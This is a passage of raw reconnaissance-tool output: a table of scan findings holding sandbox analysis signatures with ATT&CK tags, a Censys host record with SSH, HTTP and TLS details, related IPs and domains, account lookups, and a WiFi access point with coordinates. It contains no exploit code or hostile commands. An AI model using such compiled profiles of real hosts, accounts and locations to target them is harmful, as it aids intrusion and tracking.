N/A]\n "1KFJMIJ5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1KFJMIJ5.txt]- [targetUID: 00000000-00002444]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002860]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "3KD5F91L.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3KD5F91L.txt]- [targetUID: 00000000-00002444]\n "4WS5XBPW.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4WS5XBPW.txt]- [targetUID: 00000000-00002444]\n "V7T3HWNF.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\V7T3HWNF.txt]- [targetUID: 00000000-00002444]\n "Z6E6M77S.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\Z6E6M77S.txt]- [targetUID: 00000000-00002444]\n "CabB5EB.tmp" has type "data"- Location: [%TEMP%\\CabB5EB.tmp]- [targetUID: 00000000-00002860]\n "CabB5D9.tmp" has type "data"- Location: [%TEMP%\\CabB5D9.tmp]- [targetUID: 00000000-00002860]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "urlref_httpsmakeresults.alacrity.dev" has type "HTML document ASCII text with very long lines with no line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://makeresults.alacrity.dev/"\n Pattern match: "https://makeresults.alacrity.dev"\n Pattern match: "www.microsoft.com/pkiops/certs/Microsoft%20Azure%20TLS%20Issuing%20CA%2002%20-%20xsign.crt0-!http://oneocsp.microsoft.com/ocsp05E9R"\n Pattern match: "https://github.com/harsh8398/makeresults/issues/new,onClick:function(){p.a.event"\n Pattern match: "SUIDmicrosoft.com/9216234743155231030988123977893431030871MUID0A493A610C7769C3303A29660D3B6871microsoft.com/1025247992076831109342123977893431030871_EDGE_Vmicrosoft.com/9216247992076831109342124009143431030871SRCHDAF=NOFORMmicrosoft.com/1024332378944031085"\n Pattern match: "SUIDmicrosoft.com/9216234743155231030988123977893431030871MUID0A493A610C7769C3303A29660D3B6871microsoft.com/1025247992076831109342123977893431030871SRCHDAF=NOF | 185.199.108.153 |
| 2023-05-12 03:08:46 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.217 | 104.196.30.220 |
| 2023-05-12 03:00:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | hmac-sha2-256-etm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, "response": {"body": "<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": "OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": "a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": false, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": "475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne |
| 2023-05-12 03:24:29 | Company Name | No | Company Name Extractor | 0 | 0 | 4 | 0 | None | Netlify\, Inc | C=US,ST=California,L=San Francisco,O=Netlify\, Inc,CN=*.netlify.app |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Cytoid (Category: gaming)
https://cytoid.io/profile/login | login |
| 2023-05-12 02:57:37 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 8, u'threat_score': 51, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'clickupn5GDvViPHhSjBBIIBbc-2FFUoh975EJm59NMmmjNXrJ-2Fu3x3ZQluNoNM50RZUOUqoKrgFOnRwmRWHUu71GC5MBIx6GBYj9P7qe3aRx0GWJObXE-3D4Bsx_7fgdT2C2bbXW-2BVBxD7Ai0pT79XU9d12y8FqfE6JzX1P0dAOXfcRDpWVWFi7UdPTTItgHgMp07S0xmIjJ5XcgysD97BWUvGob8SQp5QwAfNfSjvCRlv2r5gZ9YjNaFf', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"206.189.74.165:443"\n "142.251.215.232:443"\n "142.251.211.234:443"\n "142.251.33.66:443"\n "108.138.246.53:443"\n "172.217.14.194:443"\n "192.184.69.201:443"\n "142.250.217.99:443"\n "142.251.33.66:80"\n "104.26.14.133:443"\n "142.251.215.226:443"\n "142.251.33.98:443"\n "142.250.69.206:443"\n "142.250.217.65:443"\n "192.184.69.215:80"\n "96.126.119.131:443"\n "172.64.132.15:443"\n "69.16.175.42:443"\n "172.67.195.248:443"\n "104.18.10.207:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"www.googletagservices.com"\n "edge.quantserve.com"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\Acrobat Instance Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\DBWinMutex"\n "DBWinMutex"\n "Local\\Acrobat Instance Mutex"\n "com.adobe.acrobat.rna.RdrCefBrowserLock.DC"\n "\\Sessions\\1\\BaseNamedObjects\\com.adobe.acrobat.rna.RdrCefBrowserLock.DC"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"assets.context.ly"\n "code.jquery.com"\n "edge.quantserve.com"\n "experience.contextly.com"\n "maxcdn.bootstrapcdn.com"\n "procureetfs.com"\n "rest.contextly.com"\n "spacenews.com"\n "stackpath.bootstrapcdn.com"\n "www.googletagservices.com"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "RdrCEF.exe" (UID: 00000000-00003912) was launched with modified environment variables: "Path"\n Process "iexplore.exe" (UID: 00000000-00001640) was launched with new environment variables: "PATH="%PROGRAMFILES%\\Internet Explorer;""\n Process "iexplore.exe" (UID: 00000000-00001640) was launched with modified environment variables: "Path"\n Process "iexplore.exe" (UID: 00000000-00001640) was launched with missing environment variables: "MEOW"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-21', u'name': u'Launches a browser', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Launches browser "iexplore.exe" (UID: 00000000-00000748)\n Launches browser "iexplore.exe" (UID: 00000000-00001864)'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-25', u'name': u'PDF file has an embedded URL', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1566/002', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-163', u'attck_id': u'T1566.002', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"https://spacenews.com/introducing-array-labs/" (Based on: "f8a9f4126162303dad458d4dba0362949da5e1bf3222d2381b98c4c2ef3a64a3.bin")\n "https://www.geospatialworld.net/prime/governmental-space-exploration-31b-globally/" (Based on: "f8a9f4126162303dad458d4dba0362949da5e1bf3222d2381b98c4c2ef3a64a3.bin")\n "https://parabolicarc.com/2022/11/14/ball-aerospace-announces-net-earnings-of-392-million-for-third-quarter/" (Based on: "f8a9f4126162303dad458d4dba0362949da5e1bf3222d2381b98c4c2ef3a64a3.bin")\n "https://spacenews.com/space-force-lays-out-timeline-for-2023-rapid-response-launch-experiment/" (Based on: "f8a9f4126162303dad458d4dba0362949da5e1bf3222d2381b98c4c2ef3a64a3.bin")\n "https://spacenews.com/inmarsat-wins-410-million-u-s-army-contract-to-connect-tracking-devices/" (Based on: "f8a9f4126162303dad458d4dba0362949da5e1bf3222d2381b98c4c2ef3a64a3.bin")\n "https://spacenews.com/esa-seeks-funding-for-navigation-technology-programs-at-ministerial/" (Based on: "f8a9f4126162303dad458d4dba0362949da5e1bf3222d2381b98c4c2ef3a64a3.bin")\n "https://procureetfs.com/ufo/" (Based on: "f8a9f4126162303dad458d4dba0362949da5e1bf3222d2381b98c4c2ef3a64a3.bin")\n "https://www.cnbc.com/2022/10/27/amazon-to-open-kuiper-internet-satellite-factory.html" (Based on: "f8a9f4126162303dad458d4dba0362949da5e1bf3222d2381b98c4c2ef3a64a3.bin")\n "https://spaceq.ca/canadensys-aerospace-wins-major-contract-will-build-the-first-canadian-moon-rover/" (Based on: "f8a9f4126162303dad458d4dba0362949da5e1bf3222d2381b98c4c2ef3a64a3.bin")\n "https://www.cnbc.com/2022/11/09/rocket-lab-q3-results-record-revenue-added-contract-wins.html" (Based on: "f8a9f4126162303dad458d4dba0362949da5e1bf3222d2381b98c4c2ef3a64a3.bin")\n "https://ark-funds.com/funds/arkx/" (Based on: "f8a9f4126162303dad458d4dba0362949da5e1bf3222d2381b98c4c2ef3a64a3.bin")\n "https://spacenews.com/capstone-enters-lunar-orbit/" (Based on: "f8a9f4126162303dad458d4dba0362949da5e1bf3222d2381b98c4c2ef3a64a3.bin")\n "https://spacenews.com/wyvern-raises-7-million-for-hyperspectral-imaging-constellation/" (Based on: "f8a9f4126162303dad458d4dba0362949da5e1bf3222d2381b98c4c2ef3a64a3.bin")\n "https://satellitenewsnetwork.com/apex-raises-seed-round-to-mass-produce-smallsats/" (Based on: "f8a9f4126162303dad458d4dba0362949da5e1bf3222d2381b98c4c2ef3a64a3.bin")\n "https://spacenews.com/cognitive-space-gets-1-2-million-u-s-air-force-contract-extension-for-satellite-tasking-software/" (Based on: "f8a9f4126162303dad458d4dba0362949da5e1bf3222d2381b98c4c2ef3a64a3.bin")\n "https://spacenews.com/sfl-hawkeye-360-flexible-support/" (Based on: "f8a9f4126162303dad458d4dba0362949da5e1bf3222d2381b98c4c2ef3a64a3.bin")\n "https://satellitenewsnetwork.com/geooptics-wins-nasa-commercial-smallsat-data-contract/" (Based on: "f8a9f4126162303dad458d4dba0362949da5e1bf3222d2381b98c4c2ef3a64a3.bin")\n "https://spaceref.com/space-commerce/rocket-lab-awarded-14m-in-contracts-to-supply-satellite-separation-systems-for-companies-supporting-space-development-agencys-tranche-1-transport-layer/" (Based on: "f8a9f4126162303dad458d4dba0362949da5e1bf3222d2381b98c4c2ef3a64a3.bin")\n "https://spacenews.com/orbit-fab-secures-new-investor-to-support-satellite-refueling-efforts/" (Based on: "f8a9f4126162303dad458d4dba0362949da5e1bf3222d2381b98c4c2ef3a64a3.bin")\n "https://www.cnbc.com/2022/10/31/terran-orbital-stock-rises-after-lockheed-martin-invests-100-million.html" (Based on: "f8a9f4126162303dad458d4dba0362949da5e1bf3222d2381b98c4c2ef3a64a3.bin")'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "RdrCEF.exe" with commandline "--backgroundcolor=16448250" (UID: 00000000-00003912)\n Spawned process "RdrCEF.exe" with commandline "--type=renderer --primordial-pipe-token=8CF16B225A6FF5D5ECE7FDEE ..." (UID: 00000000-00003316)\n Spawned process "RdrCEF.exe" with commandline "--type=renderer --primordial-pipe-token=CBBE6F137B53EB05D1E24337 ..." (UID: 00000000-00002080)\n Spawned process "iexplore.exe" with commandline "SCODEF:1640 CREDAT:275457 /prefetch:2" (UID: 00000000-00000748)\n Spawned process "iexplore.exe" with commandline "SCODEF:3856 CREDAT:275457 /prefetch:2" (UID: 00000000-00001864)'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-101', u'name': u'Found API related strings', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"https://spacenews.com/inmarsat-wins-410-million-u-s-army-contract-to-connect-tracking-devices/" (Indicator: "connect")\n "https://www.cnbc.com/2022/10/27/amazon-to-open-kuiper-internet-satellite-factory.html" (Indicator: "open")\n "endstream\nendobj\n45 0 obj\n<</Subtype/Link/Rect[ 537.64 638.3 568.83 650.71] /BS<</W 0>>/F 4/A<</Type/Action/S/URI/URI(https://www.cnbc.com/2022/10/27/amazon-to-open-kuiper-internet-satellite-factory.html) >>/StructParent 34>>\nendobj\n46 0 obj\n<</Subtype/Link/Rect[ 45.95 617.89 73.233 638.3] /BS<</W 0>>/F 4/A<</Type/Action/S/URI/URI(https://www.cnbc.com/2022/10/27/amazon-to-open-kuiper-internet-satellite-factory.html) >>/StructParent 35>>\nendobj\n47 0 obj\n<</Subtype/Link/Rect[ 45.95 535.44 99.918 555.85] /BS<</W 0>>/F 4/A<</Type/Action/S/URI/URI(https://www.cnbc.com/2022/11/14/ast-spacemobile-deploys-bluewalker-3-satellite-antenna.html) >>/StructParent 36>>\nendobj\n48 0 obj\n<</Subtype/Link/Rect[ 512 395.23 566.05 407.64] /BS<</W 0>>/F 4/A<</Type/Action/S/URI/URI(https://satellitenewsnetwork.com/uk-grants-starlink-and-telesat-ngso-licenses/) >>/StructParent 37>>\nendobj\n49 0 obj\n<</Subtype/Link/Rect[ 232.17 292.36 286.14 312.77] /BS<</W 0>>/F 4/A<</Type/Action/S/URI/URI(https://spacenews.c | 34.148.97.127 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Mastodon-API (Category: social)
https://mastodon.social/api/v2/search?q=Altpapier | Altpapier |
| 2023-05-12 02:55:21 | Physical Location | No | Censys | 0 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, 60306, Germany, Europe | 207.154.228.169 |
| 2023-05-12 03:23:23 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.7:443 | 188.114.96.0/24 |
| 2023-05-12 03:08:53 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.66 | 34.74.170.74 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | WordPress Support (Category: blog)
https://wordpress.org/support/users/login/ | login |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | NH-NEW (Net ID: 00:01:21:30:F0:43) | 37.7642, -122.3993 |
| 2023-05-12 02:53:39 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 185.199.108.153 |
| 2023-05-12 02:57:21 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:4a:0e:8c:1b:d3:a5:34:69:b6:32:8e:46:29:d8:95:17:d9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:04 2022 GMT
Not After : Feb 15 09:44:03 2023 GMT
Subject: CN=panel.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ae:fd:f2:48:0f:df:bc:e1:99:1b:6f:bd:c7:77:
53:7a:c0:8b:77:cd:2c:3c:60:53:e0:e9:b0:a7:7b:
73:98:97:7e:b8:eb:d6:f1:08:7b:2c:70:98:ff:62:
24:3a:e4:75:75:15:64:3c:f3:10:df:1f:74:86:c2:
03:e3:19:f8:ee:1b:1c:a4:33:45:b3:b5:bd:cc:36:
58:4b:c6:53:5a:e5:a0:83:1c:13:b6:0a:f0:09:85:
49:e2:af:1f:59:f3:45:35:c5:76:d8:d7:03:6b:48:
2d:81:71:8d:d8:b6:9f:ca:3d:be:a5:d1:d0:6d:84:
3f:57:a3:f9:3b:33:48:5e:3a:10:1b:9a:8e:0e:52:
e4:41:61:32:48:9e:eb:dd:91:27:08:98:23:0d:d6:
40:40:46:c6:2e:72:9b:5e:7b:a7:ce:14:5c:e3:33:
d1:e0:7f:e9:bf:c8:04:bf:dd:c3:5b:ec:18:53:dc:
e8:49:50:75:f5:f6:57:2f:90:7f:b7:6a:c4:1e:bc:
3e:2d:04:87:d0:de:ec:72:7e:5e:84:cf:77:05:c4:
81:0d:1d:68:c9:a6:7c:75:bd:ed:fa:cd:4e:88:39:
5c:0c:10:a3:f5:6d:4b:7d:20:b4:0a:24:fb:93:43:
e5:9b:70:b2:e4:95:89:06:02:90:7a:2d:6f:c2:fa:
77:78:2c:13:6f:d6:08:02:00:eb:f1:d0:25:de:0b:
0c:36:d6:0b:0b:8d:58:6f:b7:29:51:a7:c3:27:fb:
ab:fa:3f:bd:88:88:4d:63:79:00:4e:5f:ea:ff:bf:
a7:e5:c8:b9:01:b0:11:55:38:c5:2c:12:42:ec:9f:
41:d5:d8:5b:cb:0e:56:2f:f5:0b:5b:b2:1f:2e:4b:
1c:7b:f3:b8:8f:a3:2a:22:10:32:70:e5:ff:92:c9:
